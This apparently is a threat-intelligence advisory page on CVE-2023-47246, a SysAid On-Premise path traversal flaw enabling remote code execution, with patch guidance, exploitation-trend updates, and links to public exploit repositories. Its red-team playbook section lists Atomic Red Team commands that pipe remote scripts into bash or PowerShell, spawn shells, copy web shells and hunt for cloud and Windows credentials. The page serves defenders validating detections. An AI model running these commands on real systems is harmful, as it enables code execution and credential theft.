CVE-2023-47246
Overview
This vulnerability is a path traversal flaw in SysAid On-Premise versions prior to 23.3.36. The root cause lies in insufficient validation of file path inputs, enabling an attacker to write arbitrary files to the Tomcat webroot directory. The affected component is the file handling mechanism within the SysAid On-Premise server environment, specifically related to how user-supplied paths are processed and resolved.
Vulnerability Description
In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023.
Impact
An attacker can achieve remote code execution on the SysAid On-Premise server without requiring authentication or user interaction. This enables full system compromise, including execution of arbitrary commands under the Tomcat server context, potentially leading to data theft, service disruption, or lateral movement within the network. The compromise of the service desk infrastructure can result in exposure of sensitive organizational data and operational downtime.
Solution
SysAid has released version 23.3.36 addressing this vulnerability. Administrators should upgrade to this version immediately. Detailed patch instructions and security enhancements are documented at https://documentation.sysaid.com/docs/on-premise-security-enhancements-2023 and https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification. No alternative workarounds are specified; applying the vendor-provided update is required to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in SysAid On-Premise prior to version 23.3.36 is characterized as a path traversal flaw, which allows an attacker to manipulate file paths in a way that can lead to unauthorized file access and code execution. This occurs when the application fails to properly sanitize user input, particularly when handling file paths. By exploiting this weakness, an attacker can write malicious files to the Tomcat webroot directory, which is a critical component of the web server environment. Once the malicious file is executed, it can lead to a complete compromise of the server, allowing the attacker to execute arbitrary code with the same privileges as the web server process.
The attack vector for this vulnerability is primarily through web-based interactions with the SysAid application. An attacker could craft a specially designed request that includes path traversal sequences, such as "../", to navigate the file system and reach sensitive directories. This could be done through various means, including but not limited to, exploiting forms, API endpoints, or any other user input fields that interact with the file system. Once the attacker successfully writes a malicious file to the webroot, they can trigger its execution, leading to potential data breaches, unauthorized access to sensitive information, or further lateral movement within the network.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on SysAid for IT service management. Given the CVSS score of 9.8, this vulnerability is classified as critical, indicating a high likelihood of exploitation and severe consequences if successful. The potential business risks include data loss, reputational damage, and financial implications stemming from remediation efforts and regulatory fines, especially if sensitive customer or employee data is compromised. Furthermore, the exploitation of this vulnerability could lead to a broader compromise of the organization’s IT infrastructure, as attackers may use the initial foothold to escalate privileges or pivot to other systems.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to ensure that all instances of SysAid On-Premise are updated to the latest version, as this will eliminate the known vulnerability. Regular patch management practices should be established to ensure that all software is kept up to date. Additionally, organizations should conduct thorough security assessments and penetration testing to identify any potential weaknesses in their applications. Implementing web application firewalls (WAFs) can also help to filter out malicious requests that may attempt to exploit this vulnerability. Finally, monitoring logs for unusual file access patterns or unauthorized file creations can provide early indicators of an attempted exploitation.
In conclusion, the path traversal vulnerability in SysAid On-Premise presents a critical risk to organizations utilizing this software. The ability for an attacker to execute arbitrary code through this flaw underscores the importance of maintaining robust security practices, including timely updates, proactive monitoring, and comprehensive security assessments. By addressing this vulnerability and implementing strong security measures, organizations can significantly reduce their risk exposure and protect their critical assets from potential exploitation.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the CVE-2023-47246 vulnerability in SysAid On-Premise. Our telemetry indicates a doubling in observed attack activity, signaling increased adversary interest and operational tempo. This surge coincides with the public availability of multiple proof-of-concept exploits on widely accessed platforms, which lowers the barrier for threat actors to weaponize this critical path traversal flaw. The presence of ransomware-linked activity further elevates the threat profile, as attackers leverage this vulnerability to deploy malicious payloads with potential for significant operational disruption. While the EPSS score remains high and stable, the amplification in real-world exploitation attempts underscores an urgent need for heightened vigilance. Consequently, the risk landscape has intensified, reflecting a transition from theoretical to active exploitation, thereby increasing the likelihood of successful compromise for organizations running vulnerable SysAid versions.
Update 2 — July 05, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-47246, accompanied by a growing presence of publicly available proof-of-concept exploits on GitHub. This uptick in activity, while moderate, signals sustained attacker interest and a potential broadening of the threat actor base leveraging this critical SysAid vulnerability. The continued association with ransomware deployment remains a significant concern, as adversaries exploit the path traversal flaw to gain persistent access and execute malicious payloads within compromised environments. Although the Exploit Prediction Scoring System (EPSS) score remains stable at an extremely high level, the incremental rise in telemetry detections indicates that exploitation is becoming more frequent in operational settings. This evolving landscape heightens the urgency for defenders to monitor for indicators of compromise related to this vulnerability, as the risk of successful intrusion and subsequent ransomware impact is increasingly tangible.
Update 3 — July 15, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-47246, with telemetry indicating a significant uptick in adversary activity leveraging this path traversal vulnerability. This surge is accompanied by the emergence of multiple new proof-of-concept exploits publicly available on GitHub, which lowers the barrier for threat actors to weaponize the flaw. The persistence of ransomware groups exploiting this vulnerability remains a critical concern, as increased exploitation frequency correlates with a heightened risk of successful intrusions leading to ransomware deployment. Although the EPSS score remains near its peak, the current trend in detection activity signals a shift from isolated incidents to more widespread operational use. Consequently, the threat level for organizations running vulnerable SysAid On-Premise versions is elevated, underscoring the growing urgency for vigilant monitoring and incident response readiness.
Update 4 — July 23, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-47246, indicating continued adversary interest and operational use. This uptick, while modest, reflects persistent activity rather than isolated incidents, suggesting that threat actors—particularly ransomware groups—are maintaining or marginally expanding their campaigns leveraging this critical SysAid On-Premise vulnerability. The availability of multiple proof-of-concept exploits on public repositories continues to lower the barrier for exploitation, potentially broadening the attacker base. Although the EPSS score remains stable near its peak, the incremental rise in telemetry signals a sustained threat environment that defenders must monitor closely. This evolving landscape elevates the risk profile for organizations running vulnerable SysAid versions, as even a slight increase in exploitation attempts can translate into higher likelihood of successful intrusions and ransomware deployment.
Update 5 — August 15, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2023-47246, reflecting a continuing upward trend in attacker activity against vulnerable SysAid On-Premise deployments. This escalation, while moderate, underscores persistent adversary interest facilitated by publicly available proof-of-concept exploits that simplify operational execution. Our telemetry indicates that threat actors remain actively probing for opportunities to leverage this path traversal vulnerability to achieve remote code execution, with ransomware groups continuing to be implicated in observed campaigns. Although the EPSS score remains near its peak and stable, the incremental rise in exploitation signals a sustained and evolving threat environment that heightens the risk of successful compromise. Defenders should interpret this as an indication that the attack surface remains attractive and that exploitation attempts are unlikely to diminish in the near term, thereby maintaining the criticality of vigilant monitoring.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sysaid | Sysaid | All |
cpe:2.3:a:sysaid:sysaid:*:*:*:*:on-premises:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
W01fh4cker/CVE-2023-47246-EXP
exploit for cve-2023-47246 SysAid RCE (shell upload)
|
W01fh4cker | 51 | 9 | 2023-11-17 | View |
|
rainbowhatrkn/CVE-2023-47246
exploit for cve-2023-47246 SysAid RCE (shell upload)
|
rainbowhatrkn | 0 | 0 | 2023-11-22 | View |
Threat Feed
18 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-47246 |
| documentation.sysaid.com |
GitHub CVE
|
https://documentation.sysaid.com/docs/on-premise-security-enhancements-2023 |
| sysaid.com |
GitHub CVE
|
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification |
| documentation.sysaid.com |
GitHub CVE
|
https://documentation.sysaid.com/docs/latest-version-installation-files |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-47246 |